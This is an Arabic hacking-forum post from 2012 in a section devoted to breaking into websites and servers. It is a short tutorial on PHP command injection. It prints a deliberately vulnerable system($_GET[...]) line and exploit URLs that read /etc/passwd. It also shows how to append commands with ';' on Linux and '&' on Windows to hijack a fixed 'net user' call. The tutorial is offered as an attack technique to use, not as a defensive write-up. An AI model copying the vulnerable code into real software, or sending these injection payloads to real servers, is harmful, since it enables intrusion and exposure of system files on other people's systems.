نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات ..

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 09/02/2012, 13:49   المشاركة رقم: 1
المعلومات
الكاتب:
 cold  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية cold

البيانات
التسجيل : Apr 2010
العضوية : 57
الاهتمامات : hack
الإقامة : dz
المواضيع : 41
الردود : 39
المجموع : 80
بمعدل : 0.01 يوميا
الاختراقات : [dz4all]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 26/08/2015/00:29
سبب الغياب : bb
معدل التقييم: 17
نقاط التقييم: 11
cold is on a distinguished road
شكراً: 30
تم شكره 55 مرة في 33 مشاركة

 Algeria


الإتصالات
الحالة:
cold غير متواجد حالياً
وسائل الإتصال:

افتراضي تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس

السلام عليكم ورحمة الله وبركـاته

كيف حال الجميع ؟

الجميع يعرف دالة سيستم وثغرات

Remote Command Execution

كود بسيط متل هيك

كود:
<?php system($_GET['red']); ?>
استغلاله هيبقى


كود:
file.php?red=cat /etc/passwd
لحد هنا الامور تمام وده شيء بسيط بيتهيالي الكل بيدركه

لكن الجديد في الموضوع لو كان الكود كده



طبعا ده يعمل في ويندوز .. وبمجرد التصفح يديك النتيجة




تمام .. لو تم التصفح وادخال قيمة يوزر متل b0x بالشكل التاني

file.php?red=b0x

هنلاقي انه اعطانا معلومات بمعنى اصبح الامر الجاهز للتنفيذ في php بالشكل التالي


net user b0x
وهذا يكون لك امر جاهز لكن احنا كيف رح نقوم بتغير الامر بمعنى الغاء الامر net user ووضع الامر الخاص فينا
&

;
في لينكس وويندوز ..

صورة بعد التطبيق لامر


ver - يظهر اصدار كيرنل الويندوز




وامر

dir - يظهر الملفات و الفولدرز زي امر ls



في لينكس كده تصير

Red.php?red=b0x;cat /etc/passwd
بكده انتهينا
درس خفيف

./b0x

بالنسبة للامر [ ; ] هذا يشتغل في لينكس وصورة من الكود



وده الاستغلال الرابط



اما & تشتغل في ويندوز ... وبكده تمام


./b0x



آخر مواضيع » cold

عرض البوم صور cold   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 13
ApOcalYpse , bachelor , chevr0sky , cold , Dz.kH4 , HTC 28 DZ , loGin.Dz , Mr.3Jr4M , OXO , S1LV3rS3rf3r , salem k , shalhop , snifferss

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ويندوز 8 متعارض مع لينكس ADMINISTRATOR [ منتدى اخبــــار الشبكـــة] 0 26/09/2011 18:29
الصحة و العالم الإلكتروني ,,,هل يمكن لهاتفك أن يكون دواء؟؟ ADMINISTRATOR [ منتدى اخبــــار الشبكـــة] 0 20/08/2011 15:53
تخطي السيف مود في سيرفرات ويندوز safe mode on - off - اختراق المواقع Hacker_Dz [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] 4 19/08/2011 17:57
تحديث الصفحة بعض الاوامر اللي تساعد في تخطي واستغلال ثغرات الحقن Mouna128 [ منتدى حـقن قواعد البيانات | Sql injcetion ] 3 29/05/2011 17:26
[ويندوز إكس بي - windows xp]||ثيم لينكس أبونتو+أداة التعديل+مؤشرات+الكثير toxine نـظـام Windows 8 04/03/2011 03:15

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 06:20.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115